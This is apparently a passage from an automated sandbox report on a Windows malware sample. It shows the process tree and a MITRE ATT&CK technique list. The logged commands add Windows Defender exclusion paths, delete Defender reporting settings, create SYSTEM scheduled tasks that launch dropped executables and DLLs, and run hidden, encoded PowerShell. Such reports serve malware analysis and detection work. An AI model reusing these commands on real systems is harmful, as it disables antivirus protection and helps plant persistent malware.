/f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4420

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2232

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:1880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3480

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:32
3⤵
PID:4524

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:64
3⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:32
3⤵
PID:4264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:64
3⤵
PID:960

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEWySOIDG" /SC once /ST 04:34:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2424

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEWySOIDG"
2⤵
PID:4164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gEWySOIDG"
2⤵
PID:1636

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "tbikxcbubRAutxvXV" /SC once /ST 06:20:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gtigoJAOxebpSqst\dzWYTvKGVWzrmLz\TXPKdNZ.exe\" wJ /fjsite_idwjO 525403 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1052

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:844

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "tbikxcbubRAutxvXV"
2⤵
PID:3988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3848

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1828

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:400

C:\Windows\Temp\gtigoJAOxebpSqst\dzWYTvKGVWzrmLz\TXPKdNZ.exe
C:\Windows\Temp\gtigoJAOxebpSqst\dzWYTvKGVWzrmLz\TXPKdNZ.exe wJ /fjsite_idwjO 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4236

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "btbwILgIDOMomJfKYB"
2⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:4440

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:2032

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:4264

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KuTytnbkU\HgLUun.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "BDcYZHwUBrpBRcy" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4512

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BDcYZHwUBrpBRcy2" /F /xml "C:\Program Files (x86)\KuTytnbkU\ofzfZry.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1380

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BDcYZHwUBrpBRcy"
2⤵
PID:3916

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BDcYZHwUBrpBRcy"
2⤵
PID:4100

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "KahIcFOoKkuAuC" /F /xml "C:\Program Files (x86)\iyzAqDqghgpU2\sKaOzsk.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1268

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1444

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "VzRRkeuRReYYm2" /F /xml "C:\ProgramData\dTRdFhcsEOtGTQVB\ZVJKrXb.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1760

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ounCTnWLswCyVFJzQ2" /F /xml "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\EPuDQgZ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4596

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1880

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PLGPATEnutnmqCGWxdq2" /F /xml "C:\Program Files (x86)\JqMoIWPtRqoDC\EOzmhhw.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4440

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uWHYFRHVxuNygqWgi" /SC once /ST 07:58:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gtigoJAOxebpSqst\lHjuyJss\FQCeGRP.dll\",#1 /Aisite_idMSr 525403" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2492

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4524

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "uWHYFRHVxuNygqWgi"
2⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
2⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
3⤵
PID:2440

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
2⤵
PID:4388

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
3⤵
PID:4068

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tbikxcbubRAutxvXV"
2⤵
PID:1064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1724

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gtigoJAOxebpSqst\lHjuyJss\FQCeGRP.dll",#1 /Aisite_idMSr 525403
1⤵
PID:3860

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gtigoJAOxebpSqst\lHjuyJss\FQCeGRP.dll",#1 /Aisite_idMSr 525403
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:2364

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uWHYFRHVxuNygqWgi"
3⤵
PID:2600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery